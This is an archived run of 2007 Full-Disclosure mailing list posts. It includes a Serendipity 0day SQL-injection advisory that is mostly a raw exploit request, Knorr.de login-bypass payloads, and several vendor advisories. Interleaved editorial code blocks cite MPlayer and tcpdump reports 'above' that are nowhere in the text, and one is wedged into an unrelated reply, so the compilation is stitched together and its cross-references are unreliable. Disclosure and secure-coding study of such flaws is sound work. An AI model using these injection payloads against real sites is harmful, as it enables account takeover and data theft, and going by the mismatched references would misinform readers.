Message-ID: <20070301165513.66851.qmail@web27807.mail.ukl.yahoo.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

+--------------------------------------- - -- -
| SaMuschie Research Labs proudly presents . . .
+------------------------------------------- -- - -
| Application: serendipity
| Version: 1.1.1 (others not tested)
| Vuln./Exploit Type: SQL-Injection
| Status: 0day
+----------------------------------------- -- - -
| Discovered by: Samenspender
| Released: 20070301
| SaMuschie Release Number: 4
+------------------------------- - -- -

POST /serendipity/index.php?frontpage HTTP/1.0
User-Agent: Mozilla/5.0 (SaMuschie)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Connection: close

serendipity%5BmultiCat%5D%5B%5D='&serendipity%5BisMultiCat%5D=Go%21

+----------------------------- -- -
| Lameness Disclaimer
+------------------------------------- - -- - -
| SaMuschie Research Labs was founded to publish
| vulnerabilities within well known software products,
| which are easy to discover and exploit.
|
| SaMuschie researchers just spend a minimum of time
| and knowledge for each vulnerability. Hence readers of
| this advisory are requested not to ask any questions
| to the researchers.... they don't know the answer ;)
+---------------------------------- - -- - -

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF5tLFMFgfGpQK8VERAgphAJ4qvuCfLYTWO6pluhlm92gSlZz5AQCeINsc
rYF05IF5Rztw2+FzaqhUyA4=
=sQNU
-----END PGP SIGNATURE-----

___________________________________________________________
The early bird catches the worm. Get to the new Yahoo! Mail here:
http://mail.yahoo.de

From prb at lava.net Thu Mar 1 19:06:48 2007
From: prb at lava.net (Peter Besenbruch)
Date: Thu, 01 Mar 2007 09:06:48 -1000
Subject: [Full-disclosure] Stealing Browser History Without Using JavaScript
In-Reply-To: <45E68A2E.7030309@gatech.edu>
References: <6905b1570702280843h2d29b8ddl5b5efe065b62a8a2@mail.gmail.com> <45E68A2E.7030309@gatech.edu>
Message-ID: <45E72448.2030706@lava.net>

Matthew Flaschen wrote:
> "We all know there are still people out there who think turning off
> JavaScript protects them from everything."

It protects from an awful lot, and so far, from the worst stuff.

> Damn it... Good job. I guess NoScript isn't good enough anymore...

I couldn't get the demo to work over here, because of the Safe History
extension. For reference, I'll put out the links for Safe History, Safe
Cache, and Noscript:

https://addons.mozilla.org/firefox/1502/
https://addons.mozilla.org/firefox/1474/
https://addons.mozilla.org/firefox/722/

And I agree with you, RSnake did well.
--
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

From don.bailey at gmail.com Thu Mar 1 21:58:56 2007
From: don.bailey at gmail.com (don bailey)
Date: Thu, 01 Mar 2007 14:58:56 -0700
Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection
In-Reply-To: <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
Message-ID: <45E74CA0.1060207@gmail.com>

Oops, sorry for the cross post. Wasn't paying attention to the folder.
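[Editor's added example, placed here between messages. This is editorial code, not code from either of Moritz Jodeit's two reports above nor from the MPlayer or tcpdump sources. The two reports share one defect class: a length that the input itself declares (format->biSize in the DMO decoder, tim.length in the 802.11 printer) is passed to memcpy() without being compared against what the destination can hold, or is compared against the wrong field. The block below shows the checks a parser should make: a simplified BITMAPINFOHEADER-style header whose first field is its own size is copied only when that size is neither below the fixed header nor above the bytes actually present, and a TIM element is accepted only when its declared length minus the three fixed bytes fits the 251-byte bitmap, so that the length-255 case from the tcpdump report is refused rather than written one byte past the array. The struct layouts, the BIH_MAX_SIZE ceiling and the sample inputs in main() are constructed for this example.]

```c
/* Added example: validate self-declared lengths before memcpy().
 * Editorial code, not from MPlayer, tcpdump or the reports above;
 * struct layouts, BIH_MAX_SIZE and the sample inputs are constructed. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified stand-in for BITMAPINFOHEADER: the first field is the
 * structure's own declared size and comes straight from the file. */
typedef struct {
    uint32_t biSize;
    int32_t  biWidth;
    int32_t  biHeight;
    uint16_t biPlanes;
    uint16_t biBitCount;
} bih_t;

#define BIH_MAX_SIZE 4096u   /* assumed ceiling for header plus extra data */

/* Copy biSize bytes of header out of an untrusted buffer of 'avail' bytes.
 * Returns a heap copy (caller frees) and sets *out_len, or NULL when biSize
 * is below the fixed header, above the ceiling, or beyond the data present.
 * The vulnerable MPlayer code only raised small values and passed large
 * ones to memcpy() unchanged. */
void *copy_bih_checked(const uint8_t *buf, size_t avail, size_t *out_len)
{
    bih_t hdr;
    if (avail < sizeof hdr)
        return NULL;
    memcpy(&hdr, buf, sizeof hdr);
    if (hdr.biSize < sizeof hdr || hdr.biSize > BIH_MAX_SIZE || hdr.biSize > avail)
        return NULL;
    void *copy = malloc(hdr.biSize);
    if (copy == NULL)
        return NULL;
    memcpy(copy, buf, hdr.biSize);
    *out_len = hdr.biSize;
    return copy;
}

/* 802.11 TIM element: id, length, DTIM count, DTIM period, bitmap control,
 * then a partial virtual bitmap of at most TIM_BITMAP_MAX bytes. */
#define TIM_BITMAP_MAX 251

typedef struct {
    uint8_t length;                 /* one byte on the wire: 0..255 */
    uint8_t count, period, bitmap_control;
    uint8_t bitmap[TIM_BITMAP_MAX];
    size_t  bitmap_len;
} tim_t;

/* Parse a TIM element from p (n bytes).  Returns 1 on success, 0 when the
 * element is truncated or its bitmap would not fit.  A length of 255 means
 * 252 bitmap bytes, one more than the array holds, so it is refused; the
 * tcpdump code compared rates.length instead of this value. */
int parse_tim(const uint8_t *p, size_t n, tim_t *tim)
{
    if (n < 2 || p[1] < 3 || n < 2u + p[1])
        return 0;                       /* truncated element */
    tim->length         = p[1];
    tim->count          = p[2];
    tim->period         = p[3];
    tim->bitmap_control = p[4];
    size_t blen = (size_t)tim->length - 3;   /* bytes destined for the bitmap */
    if (blen > sizeof tim->bitmap)
        return 0;                       /* would overrun the fixed array */
    memcpy(tim->bitmap, p + 5, blen);
    tim->bitmap_len = blen;
    return 1;
}

int main(void)
{
    /* Constructed header: biSize claims 0x7fffffff inside a 64-byte buffer. */
    uint8_t file[64] = {0};
    uint32_t huge = 0x7fffffffu;
    memcpy(file, &huge, sizeof huge);
    size_t len = 0;
    void *h = copy_bih_checked(file, sizeof file, &len);
    printf("oversized biSize rejected: %s\n", h == NULL ? "yes" : "no");
    free(h);

    /* Constructed TIM element with length 255: refused instead of overrun. */
    uint8_t frame[2 + 255] = {5, 255};
    tim_t tim;
    printf("TIM length 255 rejected: %s\n",
           parse_tim(frame, sizeof frame, &tim) ? "no" : "yes");
    return 0;
}
```

The two checks differ in shape because the destinations differ: the header copy is sized from the input, so the declared size is bounded by the bytes available and by an explicit ceiling; the TIM bitmap is a fixed array, so the declared length is bounded by sizeof the array. Either way the comparison is made against the destination that memcpy() will actually write, which is exactly what the tcpdump check at line 267 failed to do.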
From research at matousec.com Thu Mar 1 10:40:40 2007
From: research at matousec.com (Matousec - Transparent security Research)
Date: Thu, 01 Mar 2007 11:40:40 +0100
Subject: [Full-disclosure] Comodo Bypassing settings protection using magic pipe Vulnerability
Message-ID: <45E6ADA8.50407@matousec.com>

Hello,

We would like to inform you about a vulnerability in Comodo Firewall Pro.

Description:

Comodo Firewall Pro (former Comodo Personal Firewall) stores some of its
internal settings in the registry key HKLM\SYSTEM\Software\Comodo\Personal
Firewall. This key is protected by Comodo drivers such that other
applications are not able to change the settings. This protection can be
bypassed if very special conditions are met. CFP internally uses a named
pipe, whose name varies but can always be determined. A process that
opens this pipe many times is able to manipulate the protected settings
of CFP. A proper modification of the settings will disable all protection
mechanisms implemented by CFP after a reboot.

Vulnerable software:

 * Comodo Firewall Pro 2.4.18.184
 * Comodo Firewall Pro 2.4.17.183
 * Comodo Firewall Pro 2.4.16.174
 * Comodo Personal Firewall 2.3.6.81
 * probably all older versions of Comodo Personal Firewall 2
 * possibly older versions of Comodo Personal Firewall

More details and a proof of concept including its source code are
available here:

http://www.matousec.com/info/advisories/Comodo-Bypassing-settings-protection-using-magic-pipe.php

Regards,

--
Matousec - Transparent security Research
http://www.matousec.com/

From don.bailey at gmail.com Thu Mar 1 21:52:20 2007
From: don.bailey at gmail.com (don bailey)
Date: Thu, 01 Mar 2007 14:52:20 -0700
Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection
In-Reply-To: <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com>
Message-ID: <45E74B14.3070406@gmail.com>

> http://www.milw0rm.com/exploits/3390
>
> Plagiarism sucks.

So does altering source code before you post it on your website.

http://kernelspace.us/itheft.c
http://www.milw0rm.com/exploits/3383

From falco at gentoo.org Fri Mar 2 00:35:08 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Fri, 2 Mar 2007 01:35:08 +0100
Subject: [Full-disclosure] [ GLSA 200703-03 ] ClamAV: Denial of Service
Message-ID: <20070302003508.GJ14157@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200703-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ClamAV: Denial of Service
      Date: March 02, 2007
      Bugs: #167201
        ID: 200703-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

ClamAV contains two vulnerabilities allowing a Denial of Service.
Background ========== ClamAV is a GPL virus scanner. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-antivirus/clamav < 0.90 >= 0.90 Description =========== An anonymous researcher discovered a file descriptor leak error in the processing of CAB archives and a lack of validation of the "id" parameter string used to create local files when parsing MIME headers. Impact ====== A remote attacker can send several crafted CAB archives with a zero-length record header that will fill the available file descriptors until no other is available, which will prevent ClamAV from scanning most archives. An attacker can also send an email with specially crafted MIME headers to overwrite local files with the permissions of the user running ClamAV, such as the virus database file, which could prevent ClamAV from detecting any virus. Workaround ========== The first vulnerability can be prevented by refusing any file of type CAB, but there is no known workaround for the second issue. Resolution ========== All ClamAV users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-antivirus/clamav-0.90" References ========== [ 1 ] CVE-2007-0897 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0897 [ 2 ] CVE-2007-0898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0898 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. 
License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From falco at gentoo.org Fri Mar 2 00:33:29 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Fri, 2 Mar 2007 01:33:29 +0100
Subject: [Full-disclosure] [ GLSA 200703-02 ] SpamAssassin: Long URI Denial of Service
Message-ID: <20070302003329.GH14157@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200703-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: SpamAssassin: Long URI Denial of Service
      Date: March 02, 2007
      Bugs: #166969
        ID: 200703-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

SpamAssassin is vulnerable to a Denial of Service attack.

Background
==========

SpamAssassin is an extensible email filter used to identify junk email.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  mail-filter/spamassassin      < 3.1.8                     >= 3.1.8

Description
===========

SpamAssassin does not correctly handle very long URIs when scanning emails.

Impact
======

An attacker could cause SpamAssassin to consume large amounts of CPU and memory resources by sending one or more emails containing very long URIs.
Workaround
==========

There is no known workaround at this time.

Resolution
==========

All SpamAssassin users should upgrade to the latest version.

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=mail-filter/spamassassin-3.1.8"

References
==========

  [ 1 ] CVE-2007-0451
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0451

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
From falco at gentoo.org Fri Mar 2 00:31:56 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Fri, 2 Mar 2007 01:31:56 +0100
Subject: [Full-disclosure] [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code
Message-ID: <20070302003156.GF14157@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory           GLSA 200703-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Snort: Remote execution of arbitrary code
      Date: February 23, 2007
      Bugs: #167730
        ID: 200703-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The Snort DCE/RPC preprocessor contains a buffer overflow that could result in the remote execution of arbitrary code.

Background
==========

Snort is a widely deployed intrusion detection program.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable  /                Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/snort            < 2.6.1.3                   >= 2.6.1.3

Description
===========

The Snort DCE/RPC preprocessor does not properly reassemble certain types of fragmented SMB and DCE/RPC packets.

Impact
======

A remote attacker could send specially crafted fragmented SMB or DCE/RPC packets, without the need to finish the TCP handshake, that would trigger a stack-based buffer overflow while being reassembled. This could lead to the execution of arbitrary code with the permissions of the user running the Snort preprocessor.
Workaround
==========

Disable the DCE/RPC processor by commenting 'preprocessor rpc_decode' and 'include $RULE_PATH/rpc.rules' from /etc/snort/snort.conf .

Resolution
==========

All Snort users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3"

References
==========

  [ 1 ] CVE-2006-5276
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200703-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From str0ke at milw0rm.com Fri Mar 2 03:34:23 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Mar 2007 21:34:23 -0600
Subject: [Full-disclosure] Angel LMS 7.1 - Remote SQL Injection
In-Reply-To: <45E74B14.3070406@gmail.com>
References: <20070301160606.20961.qmail@securityfocus.com> <814b9d50703010933y6707d716r903df4e337941757@mail.gmail.com> <45E74B14.3070406@gmail.com>
Message-ID: <814b9d50703011934n78768de6v240af05470da03f@mail.gmail.com>

Thank you for the info, code has been updated.

/str0ke

On 3/1/07, don bailey wrote:
>
> > http://www.milw0rm.com/exploits/3390
> >
> > Plagiarism sucks.
>
> So does altering source code before you post it on your website.
>
> http://kernelspace.us/itheft.c
> http://www.milw0rm.com/exploits/3383
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From kees at ubuntu.com Fri Mar 2 05:42:16 2007
From: kees at ubuntu.com (Kees Cook)
Date: Thu, 1 Mar 2007 21:42:16 -0800
Subject: [Full-disclosure] [USN-428-2] Firefox regression
Message-ID: <20070302054216.GX27137@outflux.net>

===========================================================
Ubuntu Security Notice USN-428-2             March 02, 2007
firefox regression
https://launchpad.net/bugs/88990
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  firefox                 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2
  libnspr4                1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2
  libnss3                 1.5.dfsg+1.5.0.10-0ubuntu0.6.06.2

After a standard system upgrade you need to restart Firefox to effect the necessary changes.

Details follow:

USN-428-1 fixed vulnerabilities in Firefox 1.5. However, changes to library paths caused applications depending on libnss3 to fail to start up. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Several flaws have been found that could be used to perform Cross-site scripting attacks. A malicious web site could exploit these to modify the contents or steal confidential data (such as passwords) from other opened web pages.
 (CVE-2006-6077, CVE-2007-0780, CVE-2007-0800, CVE-2007-0981, CVE-2007-0995, CVE-2007-0996)

 The SSLv2 protocol support in the NSS library did not sufficiently check the validity of public keys presented with a SSL certificate. A malicious SSL web site using SSLv2 could potentially exploit this to execute arbitrary code with the user's privileges. (CVE-2007-0008)

 The SSLv2 protocol support in the NSS library did not sufficiently verify the validity of client master keys presented in an SSL client certificate. A remote attacker could exploit this to execute arbitrary code in a server application that uses the NSS library. (CVE-2007-0009)

 Various flaws have been reported that could allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page. (CVE-2007-0775, CVE-2007-0776, CVE-2007-0777, CVE-2007-1092)

 Two web pages could collide in the disk cache with the result that depending on order loaded the end of the longer document could be appended to the shorter when the shorter one was reloaded from the cache. It is possible a determined hacker could construct a targeted attack to steal some sensitive data from a particular web page. The potential victim would have to be already logged into the targeted service (or be fooled into doing so) and then visit the malicious site. (CVE-2007-0778)

 David Eckel reported that browser UI elements--such as the host name and security indicators--could be spoofed by using custom cursor images and a specially crafted style sheet.
 (CVE-2007-0779)

Updated packages for Ubuntu 6.06 LTS:
From dudevanwinkle at gmail.com Thu Mar 1 22:13:59 2007
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Thu, 1 Mar 2007 17:13:59 -0500
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
Message-ID:

Does anyone know if there is a NYC 2600 group? I checked the site, but couldn't find any listings..
-JP

On 2/28/07, Steven McGrath wrote:
> The March Chicago 2600 Meeting is near! The meeting will be Friday,
> March 2nd at the Neighborhood Boys and Girls Club and will feature much
> of the same usual fun that all of you have grown to expect!
>
> [Presentation Information]
> - 9:00pm - Hacklab: Current Progress (Maniac, et al.)
> - 10:00pm - How to build a public server (Maniac)
> - After hours - Wii, Music, Socializing, etc.
>
> [General Information]
> - Meeting Time: 7.00pm - Approx. 3-5am
> - Meeting Date: Friday, March 2nd
> - Place : 2501 W Irving Park Road, Chicago
> - More Info : http://chicago2600.net
>

From sniffikins at yahoo.com Fri Mar 2 08:20:14 2007
From: sniffikins at yahoo.com (Jaime Demetur)
Date: Fri, 2 Mar 2007 00:20:14 -0800 (PST)
Subject: [Full-disclosure] G.R.I.D.S. virus being spread by the Younger Woolwich Boyz
Message-ID: <803176.31923.qm@web58904.mail.re1.yahoo.com>

http://www.encyclopediadramatica.com/index.php/Younger_Woolwich_Boyz

be careful out there folks,

Jamie

From sbauer at gjl-network.net Fri Mar 2 09:23:25 2007
From: sbauer at gjl-network.net (sbauer at gjl-network.net)
Date: Fri, 2 Mar 2007 10:23:25 +0100
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
Message-ID: <20070302102325.2admma4uco4kg488@www.gjl-network.net>

Author: Sebastian Bauer
Web: http://blog.gjl-network.net
Date: 01/12/07
Vuln. website: http://www.knorr.de
Vulnerability: SQL Injection (mainly login authentication bypass + any other SQL inj. possibility), XSS
Significance: Very Critical

---------------------------------------------------------

Detailed description:

The site knorr.de is using a MS SQL database server and IIS as web server. The programming language used is ASP (Active Server Pages).

There is a vulnerability using the login field of the site. Since user input will not be escaped, it is vulnerable against SQL injection attacks. The SQL string to authenticate the user can be escaped using single quotes. Since the database server is MS SQL it is possible to easily create a valid SQL query and ignore the rest of the SQL query by adding ;-- which ends the current query and defines the rest as comment.

There are several ways to bypass the authentication:

1.) Provide a SQL query that will be always true. In this case the system selects the first possible user (which seems to be admin but without any special privileges, as there is no real CMS behind this). An attack like this would be:

Username: -1' or 'x'='x
Password: -1' or 'x'='x

This will log you in as the user "holgi" which seems to be the first user within the user table. The -1' will be required to be sure, that the result of this query (WHERE username = '-1') will be false! The first quote is used to escape from the condition given to the SQL database. The next condition 'x'='x will make sure, that the condition fits on any record. We don't provide a closing quote and use the already existing one in the original statement to keep a valid SQL syntax.

2.) Provide a SQL query that will provide a special username as result. Example:

Username: -1' or username = 'anyUserName';--
Password:

This will result that the query returns the record of the user 'anyUserName' if it exists.
To tell MS SQL that this is the complete statement we put the ; and a -- afterwards, to tell it, that the rest of the statement which is inside the code will be handled as comment and thus not to be interpreted. We have to deliver at least one character for the password field, because otherwise the website suggests us to create a new user and does not log us in.

3.) Provide a SQL query that will provide a username which fits a special search condition. This is just a small modification of the 2nd query, which makes it possible for us to guess usernames. Example:

Username: -1' or username LIKE '%anySearchCondition%';--
Password:

This will do a normal SQL LIKE condition. You can vary it as you want. You'll get the first possible result as your login.

4.) It is also possible to manually insert new data into the database, receive information about the server and get access to a SQL shell. Those will not be described more closely in this document, as all necessary information required for this are not a miracle for anyone knowing what he is doing.

Cross-Site Scripting (XSS) Vulnerabilities:

Knorr.de is using some kind of a content loader using URL parameter which is vulnerable against XSS attacks. This has not been tested in detail and thus will not be described in depth in this document.

Also form data used for the Knorr forum will not be escaped what causes the website to offer complete freedom for using XSS inside the forum. But since this is a moderated forum this issue can be rated as a low security risk, though it could be possible to steal the session cookie of an administrator reading an infected entry to confirm or deny it and hijack the session afterwards.

---------------------------------------------------------

Summary:

This login authentication is highly significant as it is possible to login as every user we want. Knorr.de is not a website, holding strictly confidential information, but you will get access to personal user data.
There may also be a risk to the system itself as it is possible to have nearly full access to the database to delete records, tables or even get access to a SQL shell.

All problems found have been discussed with Unilever, the mother company of Knorr and have been fixed before the release of this document.

From nytrokiss at gmail.com Thu Mar 1 09:17:59 2007
From: nytrokiss at gmail.com (James Matthews)
Date: Thu, 1 Mar 2007 04:17:59 -0500
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
Message-ID: <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com>

Great i cannot wait!

On 2/28/07, Steven McGrath wrote:
>
> The March Chicago 2600 Meeting is near! The meeting will be Friday,
> March 2nd at the Neighborhood Boys and Girls Club and will feature much
> of the same usual fun that all of you have grown to expect!
>
> [Presentation Information]
> - 9:00pm - Hacklab: Current Progress (Maniac, et al.)
> - 10:00pm - How to build a public server (Maniac)
> - After hours - Wii, Music, Socializing, etc.
>
> [General Information]
> - Meeting Time: 7.00pm - Approx. 3-5am
> - Meeting Date: Friday, March 2nd
> - Place : 2501 W Irving Park Road, Chicago
> - More Info : http://chicago2600.net
>

--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
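The login bypass that Sebastian Bauer's Knorr.de advisory above walks through, as an added example that is not part of his post or of the Knorr.de code: the same user lookup built by string concatenation (the pattern the advisory describes) next to the lookup with bound parameters, fed the advisory's own payloads. SQLite stands in for the MS SQL/ASP stack the advisory names (an assumption), and the user table is constructed.

```python
import sqlite3

# Constructed stand-in for the user table the advisory describes ("holgi" is
# the first row, which is what the tautology payload logs in as). SQLite is
# used only so this runs offline; the real site ran MS SQL behind ASP.
# Plaintext passwords are kept purely to mirror the advisory; a real table
# stores salted hashes.
CONSTRUCTED_USERS = [
    ("holgi", "holgi-secret"),
    ("anna", "anna-secret"),
    ("webadmin", "admin-secret"),
]


def _connect() -> sqlite3.Connection:
    """Fresh in-memory database seeded with the constructed user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", CONSTRUCTED_USERS)
    return conn


def login_vulnerable(username: str, password: str):
    """Lookup built by concatenating the form fields into the SQL text.

    A single quote in either field closes the string literal, so
    `-1' or 'x'='x` turns the WHERE clause into a tautology (first row
    wins), and `-1' or username = 'anna';--` selects a chosen user and
    comments out the password check. Returns the matched username or None.
    """
    conn = _connect()
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    conn.close()
    return row[0] if row else None


def login_safe(username: str, password: str):
    """Same lookup with bound parameters.

    The driver hands the values to the engine separately from the SQL text,
    so quotes, OR and ;-- are compared byte-for-byte against the stored
    column and never change the shape of the query.
    """
    conn = _connect()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    tautology = "-1' or 'x'='x"
    chosen = "-1' or username = 'anna';--"
    print("concatenated, tautology payload:", login_vulnerable(tautology, tautology))
    print("concatenated, chosen user      :", login_vulnerable(chosen, "x"))
    print("parameterised, same payloads   :",
          login_safe(tautology, tautology), login_safe(chosen, "x"))
    print("parameterised, real credentials:", login_safe("anna", "anna-secret"))
```

The two functions differ only in how the form fields reach the database; that difference alone decides whether the advisory's inputs are a login or a failed login.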
From kokanin at gmail.com Fri Mar 2 14:30:29 2007
From: kokanin at gmail.com (Knud Erik Højgaard)
Date: Fri, 2 Mar 2007 15:30:29 +0100
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID:

On 3/2/07, sbauer at gjl-network.net wrote:
> Significance: Very Critical

For who, the sauce-people? Not for me.

> All problems found have been discussed with Unilever, the mother
> company of Knorr and
> have been fixed before the release of this document.

Sooo, why should anyone besides you and the sauce-people care?

--
kokanin

From sbauer at gjl-network.net Fri Mar 2 14:46:22 2007
From: sbauer at gjl-network.net (Sebastian Bauer)
Date: Fri, 02 Mar 2007 15:46:22 +0100
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To:
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID: <20070302154622.zucaj3lshwccsw8g@www.gjl-network.net>

The point why I rated those problems as high risk was that due to these problems free access to all user data was possible. And problems that will offer any kind of user data (including unencrypted passwords) are a significant security risk from my point of view (see the latest problems regarding StudiVZ). A lot of people are using the same password for websites, email and so on. And getting a password using this security hole makes it also possible to log in to a lot of email accounts that don't belong to you.

--
==============================
Sebastian Bauer
http://blog.gjl-network.net

Quoting Knud Erik Højgaard:

> On 3/2/07, sbauer at gjl-network.net wrote:
>
>> Significance: Very Critical
>
> For who, the sauce-people? Not for me.
>
>> All problems found have been discussed with Unilever, the mother
>> company of Knorr and
>> have been fixed before the release of this document.
>
> Sooo, why should anyone besides you and the sauce-people care?
>
> --
> kokanin

From joe.hancock at gmail.com Fri Mar 2 14:43:36 2007
From: joe.hancock at gmail.com (Joe Hancock)
Date: Fri, 2 Mar 2007 14:43:36 +0000
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To:
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID:

I was also going to query the way vulnerabilities are rated on a personal level here...

Significance: Double Plus Ungood

It's always nice to see problems being solved instead of just targeted, while maintaining disclosure though Sebastian.

Regards,

Joe.

On 02/03/07, Knud Erik Højgaard wrote:
> On 3/2/07, sbauer at gjl-network.net wrote:
> > Significance: Very Critical
>
> For who, the sauce-people? Not for me.
>
> > All problems found have been discussed with Unilever, the mother
> > company of Knorr and
> > have been fixed before the release of this document.
>
> Sooo, why should anyone besides you and the sauce-people care?
>
> --
> kokanin
>

From lcamtuf at dione.ids.pl Fri Mar 2 14:56:09 2007
From: lcamtuf at dione.ids.pl (Michal Zalewski)
Date: Fri, 2 Mar 2007 15:56:09 +0100 (CET)
Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities
In-Reply-To:
References: <20070302102325.2admma4uco4kg488@www.gjl-network.net>
Message-ID:

